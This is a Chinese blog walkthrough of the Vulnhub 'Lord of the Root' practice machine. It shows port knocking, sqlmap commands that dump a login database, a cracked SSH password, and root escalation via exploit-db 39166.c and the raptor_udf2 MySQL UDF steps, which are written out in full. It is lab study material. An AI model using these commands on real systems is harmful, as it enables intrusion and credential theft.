2021年1月1日-Vulnhub-LordOfTheRoot 渗透学习

于 2021-01-01 22:30:34 发布
阅读量712 收藏 1
点赞数
文章标签: 经验分享 kali linux 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AnonyMousIT/article/details/112075431
版权

2021年1月1日-LordOfTheRoot 渗透学习

一、简介

靶机下载地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/

kali地址:192.168.31.77

靶机IP地址:192.168.31.95

二、信息收集

发现靶机IP地址:192.168.31.95

image-20201231141747945

扫描到开放着 22端口

image-20201231143748421

先将22端口作为突破口,访问一下

提示 Easy as 1,2,3

可能存在端口碰撞

image-20201231144022222

端口碰撞尝试一下

image-20201231144402604

重新扫描 发现1337端口

image-20201231144515302

通过浏览器访问 1337端口,并没有发现什么有价值的线索

image-20201231144629909

尝试访问robots.txt

robots.txt是每次渗透都要重视的文件

image-20201231144914606

发现base64 的编码 THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>

对其进行解码两次

image-20201231150319677

发现 /978345210/index.php

访问http://192.168.31.95:1337/978345210/index.php

image-20201231150443595

是一个登录页面,使用sqlmap爆破一下

由于我们不知道用户名和密码,因此,使用SQLMAP进行基于登录表单的注入,

sqlmap -u 'http://192.168.31.95:1337/978345210/index.php' --forms --dbs --risk=3 --level=5 --threads=4 --batch

image-20201231152839804

image-20201231152812216

收集数据表

sqlmap -u 'http://192.168.31.95:1337/978345210/index.php' --forms -D Webapp  --tables  --risk=3 --level=5 --threads=4 --batch

image-20201231153246249

查看User数据表

sqlmap -u 'http://192.168.31.95:1337/978345210/index.php' --forms -D Webapp  -T Users --columns  --risk=3 --level=5 --threads=4 --batch

image-20201231154907953

sqlmap -u 'http://192.168.31.95:1337/978345210/index.php' --forms -D Webapp  -T Users -C id,username,password --dump --batch

image-20201231155640488

将用户名和密码分别保存在两个文件中

image-20201231161642320

使用msfconsole 爆破ssh的密码,得到 smeagol:MyPreciousR00t

image-20201231162728243

三、提权

第一种方法:利用系统漏洞提权

登录ssh 并 查看内核版本

image-20201231163806401

image-20201231163833376

搜索该版本的漏洞

image-20210101140627334

image-20210101140708454

image-20201231164010649

将39166.c 从 /usr/share/exploitdb/exploits/linux/local/39166.c 复制出来

image-20210101140934891

利用python 开启http服务

image-20210101141108275

将39166.c 加载到本地,编译执行,获得权限

image-20210101141719636

第二种方法:使用mysql提权

查看mysql 的版本

image-20210101144950915

查看mysql 数据库的root密码

image-20210101203556886

搜索对应版本的漏洞

image-20210101150823698

将1518.c下载到靶机本地

image-20210101152626111

image-20210101152644896

查看1518.c的使用方法

image-20210101202703797

image-20210101202458214

mv 1518.c raptor_udf2.c  重命名
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

image-20210101203931662

mysql -u root -p

mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select * from mysql.func;
 * +-----------+-----+----------------+----------+
 * | name      | ret | dl             | type     |
 * +-----------+-----+----------------+----------+
 * | do_system |   2 | raptor_udf2.so | function |
 * +-----------+-----+----------------+----------+
mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
mysql> \! sh
sh-2.05b$ cat /tmp/out

select * from foo into dumpfile ‘/usr/lib/mysql/plugin/raptor_udf2.so’;

image-20210101214637879

此方法卡在这里了,权限不足无法将已经创建的文件删除

第三种方法:缓冲区溢出提权

未完待续。。

在下菜鸟
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值